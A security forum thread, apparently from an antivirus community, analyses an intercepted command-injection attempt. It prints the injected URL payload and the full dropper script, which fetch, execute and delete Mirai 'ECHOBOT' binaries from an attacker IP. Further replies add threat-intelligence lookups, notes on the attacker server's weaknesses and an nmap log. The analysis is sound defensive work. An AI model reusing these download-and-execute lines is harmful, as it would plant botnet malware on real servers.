What Lies Behind This Command Injection?

We intercepted a Command Injection, which came in via a website that we monitor. Note: I’ve removed client specific data from this, and I’m using GENERALIZED URL information to demonstrate what the command was supposed to do. We found the script he was using to try and exploit the server - he was a script kiddie from Russia. (Host was not vulnerable! Keep your sh*t updated!!! Otherwise, this would’ve been a cleanup day, not a post!)

WARNING: EVERYTHING AFTER THIS IS HIGHLY MALICIOUS!!!


www.example.com/location/to/script.extension?wget%20http://145.249(dot)106.241/richard;curl%20-O%20hxxp://145.249(dot)106.241/richard;chmod%20+x richard;sh richard;

This translates to


#Vulnerable Website Executes the following commands server side.
wget hxxp://145.249(dot)106.241/richard; #First download
curl -O hxxp://145.249(dot)106.241/richard; #second download
chmod +x richard; #Make Richard executable
sh richard #Executes the script "richard"

Sometimes hosts block specific commands (like wget and curl, hence run both. Worst that happens is one overwrites the other!)

I pulled that file from their server and found this.


#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm; chmod +x ECHOBOT.arm; ./ECHOBOT.arm; rm -rf ECHOBOT.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm4; chmod +x ECHOBOT.arm4; ./ECHOBOT.arm4; rm -rf ECHOBOT.arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm5; chmod +x ECHOBOT.arm5; ./ECHOBOT.arm5; rm -rf ECHOBOT.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm6; chmod +x ECHOBOT.arm6; ./ECHOBOT.arm6; rm -rf ECHOBOT.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm7; chmod +x ECHOBOT.arm7; ./ECHOBOT.arm7; rm -rf ECHOBOT.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.i686; chmod +x ECHOBOT.i686; ./ECHOBOT.i686; rm -rf ECHOBOT.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.m68k; chmod +x ECHOBOT.m68k; ./ECHOBOT.m68k; rm -rf ECHOBOT.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.mips; chmod +x ECHOBOT.mips; ./ECHOBOT.mips; rm -rf ECHOBOT.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241ECHOBOT.mpsl; chmod +x ECHOBOT.mpsl; ./ECHOBOT.mpsl; rm -rf ECHOBOT.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.ppc; chmod +x ECHOBOT.ppc; ./ECHOBOT.ppc; rm -rf ECHOBOT.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.sh4; chmod +x ECHOBOT.sh4; ./ECHOBOT.sh4; rm -rf ECHOBOT.sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.spc; chmod +x ECHOBOT.spc; ./ECHOBOT.spc; rm -rf ECHOBOT.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.x86; chmod +x ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86

The explanation of these commands is as follows.

If you cannot cd /tmp, try /var/run, else if try /mnt, else if try /root, else try /. If one of those returns true, move onto the next command (wget). If you were studious, you may have noticed a typo in this guys script. It tries one version, then deletes itself. Try them all. He’d have a listener listening until one of the ECHOBOT’s reported back.

Of course, these are just simple wget functions! We can download that as well!


curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm4
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm5
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm6
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)arm7
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)i686
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)m68k
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)mips
curl -O hxxp://145(dot)249(dot)106(dot)241ECHOBOT(dot)mpsl
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)ppc
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)sh4
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)spc
curl -O hxxp://145(dot)249(dot)106(dot)241/ECHOBOT(dot)x86

What do these files reveal? None other then Mirai, the backdoor/botnet!

https://www.virustotal.com/gui/file-analysis/NTAxZGQwY2M5MGYyODkyOTYwMzNlY2FkYWE2MjYwNGY6MTU3NjEwNjY2OQ==/detection

Good attempt, but failed miserably. To date, we’d (my company) had never been able to grab a live sample of Mirai. Today, I managed to grab it as it happened! Cheers to the IPS/IDS product that successfully detected and blocked the exploit attempt!

As of writing this post, those links are still live! You have been warned!

Hi Michael (alan1998),

Here a full analysis of that specific malware of 6 hours ago:
-https://maltiverse.com/sample/3a648ce765acd54fab4cbe4f35ddb962572a27d9522fa92105ef6324af47711e
(make link live for researchers :wink: ) Let’s see how long it takes before avast has detection for this,

Launched via an Amsterdam (the Netherlands) rack? → https://www.shodan.io/host/145.249.106.241
on linux.3x portmapper port 111? Fixed line ISP with a Bulgarian connection.

Thanks for reporting. You could also report to UrlHaus. :wink: :-X

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter).

THe command injection itself came from Russia - not the web server hosting the malware :P.

commandline
http://145.249.106.241/richard;%20curl%20-O%20http:/145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard

Pulled that from the report - look familiar?? I may have missed the odd space or two (%20) but it’s pretty damn close!

I had a port scan on them via one of our VM’s. They must’ve switched boxes because my port scans (from yesterday) revealed a CentOS 7 box. It had a bunch of ports open, Telnet (23) - Filtered, 3306, 5555, 5000, 5060, among others. I’m not at the office today, but I’ll be able to grab the port scan tomorrow.

Hi Michael (alan1998),

Command injection may have come in from Russia, if this * ((see below) is what you mean)),
but that Apache HTTP Server seems to be nothing more than having the proverbial ‘sieve’/holed Swiss cheese grade status.
See all the permissions that can be set to your advance.

IP opens up to Apache 2 HTTP Server Test page powered by Centos.
Has Apache/2.2.15 CentOS

Does not offer a secure connection, does not supply ownership information.

A TLS renegotiation prefix injection attack is possible *.
See: https://www.cvedetails.com/version/93077/Apache-Http-Server-2.2.15.html
&
https://www.cvedetails.com/vulnerability-list.php?vendor_id=45&product_id=66&version_id=93077&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&cweid=0&order=1&trc=29&sha=f3811a977415e66eff5d8b9d9b8c21d064617677

Insecure permissions possible. CSP tester can be used actively.

7 solutions now detect the IP uri given in the first posting of this thread:
https://www.virustotal.com/gui/ip-address/145.249.106.241/relations

IP address is owned by IP Volume inc from the Seychelles (liberty Services), IP Broker Ltd.
OPenSSH 5.3 (protocol 2.0) port 22 ; 80 tcp open - http methods - risky method: TRACE

For the accompanying shellscript detection, see: https://www.virustotal.com/gui/file/0e87d4a97b64beb7fe27e0b21d73eb0da353467d99710566dda8b07f953798ef/detection

Now 29 (initially 30) engines to detect and avast & AVG detect this malware as “BV:Downloader-AAN [Drp]”,
We have protection! Avast Mobile does not have it, but I do not know whether that’s a point :smiley:
Can you fill me in on that point, roger?

Consider high risk 9 red out of 10 here: -https://toolbar.netcraft.com/site_report?url=http%3A%2F%2F145.249.106.241%2Frichard%3B%2520curl%2520-O%2520http%3A%2F145.249.106.241%2Frichard%3B%2520chmod%2520%2Bx%2520richard%3B%2520sh%2520richard+

&

Netcraft risk grade 9 red out of 10: https://toolbar.netcraft.com/site_report?url=145.249.106.241

Immediate threats that helped this malcreant/attacker abuse:

Susceptible to MiM attacks - because SSL not being available.

Vulnerabilities can be uncovered more easily, because Server information header exposed,
so excessive header information proliferation.

Vulnerabilities
Vulnerable software versions detected

Unnecessary open ports
App ports open

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

What is being hosted by AS29073 Quasi Network LTD? - https://www.who-hosts-this.com/Hosts/1322-Quasi-Networks-LTD
Smut sites galore and one of the other sites with a minimal to non-existent grade of security: https://internet.nl/site/rootcracked.com/678002/

This is an obscure and shady hosting party: Hosting sites with messages like "
“This domain name registration has expired and renewal or deletion are pending.
If you are the registrant and want to renew the domain name, please contact your registration service provider.”
Also spammer - see list of vulnerabilities here: https://www.shodan.io/host/145.249.106.241

145.249.106.241
Liberty
Added on 2019-12-12 12:49:16 GMT
Netherlands Netherlands, Amsterdam

Part of those darknet back-alleys of the Interwebz. & human abuse, etc. etc.
Stay out, do not go or venture out there.

Some Intelligence to proof this: https://intelx.io/?s=quasinetworks.com (info credits Intelligence X)

Can imagine certain cybercriminal attackers and malware launchers,
that would prefer to operate from within such a swamp surroundings to do their evil scripting deeds.

Who would come and look for them there and who’s to complaint about their additional abuse?

polonus

When I get home, I’ll rescan their IP Address, Looks like they close some of their ports…

But for the mean time, I have scanning to do on a client network. Saddening to hear reports of CP being reported and not taken down. But by the second report I’d have gone to the authorities, not continued reporting to the same body who has previously ignored it.

Cheers,
Mike

Well done, Mike, :wink: :stuck_out_tongue:

I hope authorities in the capital city of my country will read here as well.
Furthermore hope they are in the position to close down the illegal part of the activities going on there a.s.a.p.,
and send it to permanent digital oblivion.

Gives me a good feeling that we can cooperate in the way we do,
as all good researchers should stand on each others shoulders.

Keep fighting the good battle in the digital realms and keep racks and code up to solid high and secure standards.

Cheers, my good friend, kind regards from,

polonus aka Damian

Just getting around to that final scan.

Website reports as offline.


Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-12 23:08 Atlantic Standard Time

NSE: Loaded 151 scripts for scanning.

NSE: Script Pre-scanning.

Initiating NSE at 23:08

Completed NSE at 23:08, 0.00s elapsed

Initiating NSE at 23:08

Completed NSE at 23:08, 0.00s elapsed

Initiating NSE at 23:08

Completed NSE at 23:08, 0.00s elapsed

Initiating Ping Scan at 23:08

Scanning 145.249.106.241 [4 ports]

Completed Ping Scan at 23:08, 3.46s elapsed (1 total hosts)

Nmap scan report for 145.249.106.241 [host down]

NSE: Script Post-scanning.

Initiating NSE at 23:08

Completed NSE at 23:08, 0.00s elapsed

Initiating NSE at 23:08

Completed NSE at 23:08, 0.00s elapsed

Initiating NSE at 23:08

Completed NSE at 23:08, 0.00s elapsed

Read data files from: C:\Program Files (x86)\Nmap

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

Nmap done: 1 IP address (0 hosts up) scanned in 6.47 seconds

           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)